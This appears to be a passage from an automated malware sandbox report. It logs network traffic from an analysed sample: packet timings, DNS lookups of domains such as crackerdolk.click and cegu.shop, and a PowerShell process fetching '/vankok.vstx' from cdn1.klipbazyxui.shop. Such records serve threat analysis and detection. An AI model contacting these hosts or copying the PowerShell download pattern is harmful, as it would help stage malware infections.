                                                                                      Dec 29, 2024 09:23:29.993279934 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:29.993398905 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.030503988 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.030529022 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.030586004 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.030633926 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.030652046 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.030747890 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.036019087 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.036036968 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.036087036 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.036108017 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.036257982 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.040802956 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.040818930 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.040872097 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.040894985 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.040910006 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.041039944 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.046284914 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.046303034 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.046341896 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.046371937 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.046385050 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.046410084 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.083580971 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.083607912 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.083645105 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.083678961 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.083693981 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.083766937 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.184091091 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.184118032 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.184168100 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.184195995 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.184209108 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.184237003 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.188915968 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.188934088 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.189003944 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.189009905 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.189054966 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.194322109 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.194339037 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.194374084 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.194380045 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.194403887 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.194420099 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.231865883 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.231889963 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.231930971 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.231954098 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.231970072 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.232062101 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.237526894 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.237554073 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.237598896 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.237605095 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.237639904 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.237647057 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.242412090 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.242429972 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.242469072 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.242474079 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.242506981 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.242512941 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.248045921 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.248109102 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.248150110 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.248155117 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.248164892 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.248204947 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.285018921 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.285048962 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.285145044 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.285162926 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.285260916 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.385181904 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.385219097 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.385252953 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.385265112 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.385292053 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.385324001 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.388254881 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.388329983 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.388333082 CET44349709104.21.72.190192.168.2.5
                                                                                      Dec 29, 2024 09:23:30.388382912 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:23:30.391283989 CET49709443192.168.2.5104.21.72.190
                                                                                      Dec 29, 2024 09:25:05.003349066 CET49931443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:05.003420115 CET44349931104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:05.003516912 CET49931443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:05.004447937 CET49931443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:05.004484892 CET44349931104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:06.266109943 CET44349931104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:06.266211033 CET49931443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:06.267944098 CET49931443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:06.267966986 CET44349931104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:06.268645048 CET44349931104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:06.327697039 CET49931443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:06.327697039 CET49931443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:06.327800989 CET44349931104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:07.120043039 CET44349931104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:07.120120049 CET44349931104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:07.120187998 CET49931443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:07.122258902 CET49931443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:07.122303963 CET44349931104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:07.122332096 CET49931443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:07.122351885 CET44349931104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:07.130497932 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:07.130544901 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:07.130706072 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:07.131552935 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:07.131584883 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:08.457587957 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:08.457698107 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:08.458885908 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:08.458910942 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:08.459198952 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:08.460578918 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:08.460578918 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:08.460660934 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.370682001 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.370732069 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.370764017 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.370794058 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.370799065 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.370855093 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.370893955 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.370912075 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.370946884 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.370970011 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.370986938 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.371042967 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.379160881 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.387896061 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.387991905 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.388011932 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.485738993 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.485761881 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.581046104 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.581099987 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.581120968 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.584880114 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.584939957 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.584954023 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.592540026 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.592597961 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.592611074 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.592631102 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.592696905 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.594362020 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.594362020 CET49936443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.594394922 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.594418049 CET44349936104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.727902889 CET49945443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.727931023 CET44349945104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:10.728046894 CET49945443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.728334904 CET49945443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:10.728348017 CET44349945104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:11.939533949 CET44349945104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:11.939595938 CET49945443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:11.940634966 CET49945443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:11.940644026 CET44349945104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:11.940846920 CET44349945104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:11.941811085 CET49945443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:11.941922903 CET49945443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:11.941956043 CET44349945104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:13.084811926 CET44349945104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:13.084884882 CET44349945104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:13.084950924 CET49945443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:13.085124016 CET49945443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:13.085135937 CET44349945104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:13.102976084 CET49951443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:13.103024960 CET44349951104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:13.103128910 CET49951443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:13.103375912 CET49951443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:13.103390932 CET44349951104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:14.357631922 CET44349951104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:14.357821941 CET49951443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:14.358927011 CET49951443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:14.358939886 CET44349951104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:14.359141111 CET44349951104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:14.360318899 CET49951443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:14.360475063 CET49951443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:14.360508919 CET44349951104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:14.360559940 CET49951443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:14.403371096 CET44349951104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:15.264241934 CET44349951104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:15.264323950 CET44349951104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:15.264380932 CET49951443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:15.296211958 CET49951443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:15.296236038 CET44349951104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:15.387056112 CET49957443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:15.387160063 CET44349957104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:15.387264013 CET49957443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:15.387574911 CET49957443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:15.387603998 CET44349957104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:16.688525915 CET44349957104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:16.688616991 CET49957443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:16.689707994 CET49957443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:16.689740896 CET44349957104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:16.689980984 CET44349957104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:16.691103935 CET49957443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:16.691227913 CET49957443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:16.691276073 CET44349957104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:16.691369057 CET49957443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:16.691385984 CET44349957104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:17.678864002 CET44349957104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:17.678951025 CET44349957104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:17.679012060 CET49957443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:17.679358006 CET49957443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:17.679385900 CET44349957104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:17.962457895 CET49965443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:17.962485075 CET44349965104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:17.962537050 CET49965443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:17.962898970 CET49965443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:17.962910891 CET44349965104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:19.173194885 CET44349965104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:19.173274994 CET49965443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:19.174841881 CET49965443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:19.174850941 CET44349965104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:19.175076008 CET44349965104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:19.176187992 CET49965443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:19.176290035 CET49965443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:19.176295996 CET44349965104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:20.029223919 CET44349965104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:20.029326916 CET44349965104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:20.029386044 CET49965443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:20.029464960 CET49965443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:20.029475927 CET44349965104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:20.065660000 CET49969443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:20.065686941 CET44349969104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:20.065773964 CET49969443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:20.065989971 CET49969443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:20.066000938 CET44349969104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:21.274494886 CET44349969104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:21.274570942 CET49969443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:21.295793056 CET49969443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:21.295829058 CET44349969104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:21.296013117 CET44349969104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:21.297324896 CET49969443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:21.297513008 CET49969443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:21.297521114 CET44349969104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:22.289128065 CET44349969104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:22.289217949 CET44349969104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:22.289278030 CET49969443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:22.291261911 CET49969443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:22.291286945 CET44349969104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:22.298074007 CET49975443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:22.298096895 CET44349975104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:22.298156977 CET49975443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:22.298696041 CET49975443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:22.298703909 CET44349975104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:23.555779934 CET44349975104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:23.555990934 CET49975443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:23.557251930 CET49975443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:23.557257891 CET44349975104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:23.557476044 CET44349975104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:23.558665991 CET49975443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:23.558686972 CET49975443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:23.558720112 CET44349975104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:24.358697891 CET44349975104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:24.358763933 CET44349975104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:24.358807087 CET49975443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:24.360002995 CET49975443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:24.360013008 CET44349975104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:24.360022068 CET49975443192.168.2.5104.21.80.1
                                                                                      Dec 29, 2024 09:25:24.360028028 CET44349975104.21.80.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:24.638684988 CET49982443192.168.2.5185.161.251.21
                                                                                      Dec 29, 2024 09:25:24.638720036 CET44349982185.161.251.21192.168.2.5
                                                                                      Dec 29, 2024 09:25:24.638788939 CET49982443192.168.2.5185.161.251.21
                                                                                      Dec 29, 2024 09:25:24.639100075 CET49982443192.168.2.5185.161.251.21
                                                                                      Dec 29, 2024 09:25:24.639117002 CET44349982185.161.251.21192.168.2.5
                                                                                      Dec 29, 2024 09:25:26.273315907 CET44349982185.161.251.21192.168.2.5
                                                                                      Dec 29, 2024 09:25:26.273390055 CET49982443192.168.2.5185.161.251.21
                                                                                      Dec 29, 2024 09:25:26.274848938 CET49982443192.168.2.5185.161.251.21
                                                                                      Dec 29, 2024 09:25:26.274854898 CET44349982185.161.251.21192.168.2.5
                                                                                      Dec 29, 2024 09:25:26.275083065 CET44349982185.161.251.21192.168.2.5
                                                                                      Dec 29, 2024 09:25:26.276154995 CET49982443192.168.2.5185.161.251.21
                                                                                      Dec 29, 2024 09:25:26.319339037 CET44349982185.161.251.21192.168.2.5
                                                                                      Dec 29, 2024 09:25:26.797211885 CET44349982185.161.251.21192.168.2.5
                                                                                      Dec 29, 2024 09:25:26.797261000 CET44349982185.161.251.21192.168.2.5
                                                                                      Dec 29, 2024 09:25:26.797357082 CET49982443192.168.2.5185.161.251.21
                                                                                      Dec 29, 2024 09:25:26.833960056 CET49982443192.168.2.5185.161.251.21
                                                                                      Dec 29, 2024 09:25:26.833992004 CET44349982185.161.251.21192.168.2.5
                                                                                      Dec 29, 2024 09:25:26.834006071 CET49982443192.168.2.5185.161.251.21
                                                                                      Dec 29, 2024 09:25:26.834012032 CET44349982185.161.251.21192.168.2.5
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Dec 29, 2024 09:23:10.042923927 CET5453453192.168.2.51.1.1.1
                                                                                      Dec 29, 2024 09:23:10.348978996 CET53545341.1.1.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:04.667570114 CET5451053192.168.2.51.1.1.1
                                                                                      Dec 29, 2024 09:25:04.997836113 CET53545101.1.1.1192.168.2.5
                                                                                      Dec 29, 2024 09:25:24.386349916 CET6108053192.168.2.51.1.1.1
                                                                                      Dec 29, 2024 09:25:24.637893915 CET53610801.1.1.1192.168.2.5
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Dec 29, 2024 09:23:10.042923927 CET192.168.2.51.1.1.10xb6b6Standard query (0)cdn1.klipbazyxui.shopA (IP address)IN (0x0001)false
                                                                                      Dec 29, 2024 09:25:04.667570114 CET192.168.2.51.1.1.10x439bStandard query (0)crackerdolk.clickA (IP address)IN (0x0001)false
                                                                                      Dec 29, 2024 09:25:24.386349916 CET192.168.2.51.1.1.10x48edStandard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Dec 29, 2024 09:23:10.348978996 CET1.1.1.1192.168.2.50xb6b6No error (0)cdn1.klipbazyxui.shop104.21.72.190A (IP address)IN (0x0001)false
                                                                                      Dec 29, 2024 09:23:10.348978996 CET1.1.1.1192.168.2.50xb6b6No error (0)cdn1.klipbazyxui.shop172.67.154.95A (IP address)IN (0x0001)false
                                                                                      Dec 29, 2024 09:25:04.997836113 CET1.1.1.1192.168.2.50x439bNo error (0)crackerdolk.click104.21.80.1A (IP address)IN (0x0001)false
                                                                                      Dec 29, 2024 09:25:04.997836113 CET1.1.1.1192.168.2.50x439bNo error (0)crackerdolk.click104.21.64.1A (IP address)IN (0x0001)false
                                                                                      Dec 29, 2024 09:25:04.997836113 CET1.1.1.1192.168.2.50x439bNo error (0)crackerdolk.click104.21.32.1A (IP address)IN (0x0001)false
                                                                                      Dec 29, 2024 09:25:04.997836113 CET1.1.1.1192.168.2.50x439bNo error (0)crackerdolk.click104.21.112.1A (IP address)IN (0x0001)false
                                                                                      Dec 29, 2024 09:25:04.997836113 CET1.1.1.1192.168.2.50x439bNo error (0)crackerdolk.click104.21.96.1A (IP address)IN (0x0001)false
                                                                                      Dec 29, 2024 09:25:04.997836113 CET1.1.1.1192.168.2.50x439bNo error (0)crackerdolk.click104.21.48.1A (IP address)IN (0x0001)false
                                                                                      Dec 29, 2024 09:25:04.997836113 CET1.1.1.1192.168.2.50x439bNo error (0)crackerdolk.click104.21.16.1A (IP address)IN (0x0001)false
                                                                                      Dec 29, 2024 09:25:24.637893915 CET1.1.1.1192.168.2.50x48edNo error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                      • cdn1.klipbazyxui.shop
                                                                                      • crackerdolk.click
                                                                                      • cegu.shop
                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.549709104.21.72.1904437464C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-12-29 08:23:11 UTC82OUTGET /vankok.vstx HTTP/1.1
                                                                                      Host: cdn1.klipbazyxui.shop
                                                                                      Connection: Keep-Alive
                                                                                      2024-12-29 08:23:12 UTC991INHTTP/1.1 200 OK
                                                                                      Date: Sun, 29 Dec 2024 08:23:12 GMT
